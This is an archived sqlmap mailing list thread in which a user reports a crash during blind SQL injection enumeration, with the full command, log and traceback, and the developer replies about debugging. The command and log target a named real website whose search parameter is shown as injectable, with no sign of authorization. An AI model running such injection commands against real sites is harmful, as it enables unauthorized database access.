Re: [sqlmap-users] Sqlmap: DBMS Microsoft SQL Server 2005 --current-db ERROR
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Sqlmap: DBMS Microsoft SQL Server 2005 --current-db ERROR
|
From: Miroslav S. <mir...@gm...> - 2010-10-09 00:26:40
|
also, i've tried your attack "vector" and couldn't find any results with that site. is there any other way to retest it? kr On Sat, Oct 9, 2010 at 2:24 AM, Miroslav Stampar <mir...@gm...> wrote: > hi. > > could you please send me privately content of a file: > /home/unkq/sqlmap/output/www.cssd.cz/session > for further analysis. > > also, please retry your testing with usage of flag: --flush-session. > > kind regards. > > On Fri, Oct 8, 2010 at 7:42 PM, Pavel Saparov <sap...@gm...> wrote: >> Hello there, I got another error with sqlmap-0.9dev: >> >> $ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a >> "./txt/user-agents.txt" --current-db --threads 3 >> >> [*] starting at: 19:21:53 >> >> [19:21:53] [INFO] fetched random HTTP User-Agent header from file >> './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) >> Gecko/20060130 SeaMonkey/1.0 >> [19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as >> session file >> [19:21:53] [INFO] resuming match ratio '0.9' from session file >> [19:21:53] [INFO] resuming injection point 'GET' from session file >> [19:21:53] [INFO] resuming injection parameter 'slovo' from session file >> [19:21:53] [INFO] resuming injection type 'stringdouble' from session file >> [19:21:53] [INFO] resuming 2 number of parenthesis from session file >> [19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from >> session file >> [19:21:53] [INFO] testing connection to the target url >> [19:21:58] [INFO] testing for parenthesis on injectable parameter >> [19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server >> >> web application technology: Apache >> back-end DBMS: Microsoft SQL Server 2005 >> [19:21:58] [INFO] fetching current database >> [19:21:58] [INFO] retrieving the length of query output >> [19:21:58] [INFO] retrieved: >> 816555554554444447411111114444455444444121445455444511111 >> >> [19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the >> command line and the following text and send by e-mail to >> sql...@li.... The developer will fix it as soon as >> possible: >> sqlmap version: 0.9-dev >> Python version: 2.6.4 >> Operating system: posix >> Traceback (most recent call last): >> File "sqlmap.py", line 96, in main >> start() >> File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start >> action() >> File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action >> conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb()) >> File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in >> getCurrentDb >> kb.data.currentDb = inject.getValue(query) >> File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue >> value = __goInferenceProxy(expression, fromUser, expected, batch, >> resumeValue, unpack, charsetType, firstChar, lastChar) >> File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in >> __goInferenceProxy >> output = resume(expression, payload) >> File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume >> if len(resumedValue) == int(length): >> ValueError: invalid literal for int() with base 10: >> '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211' >> >> [*] shutting down at: 19:31:43 >> >> ------------------------------------------------------------------------------ >> Beautiful is writing same markup. Internet Explorer 9 supports >> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3. >> Spend less time writing and rewriting code and more time creating great >> experiences on the web. Be a part of the beta today. >> http://p.sf.net/sfu/beautyoftheweb >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
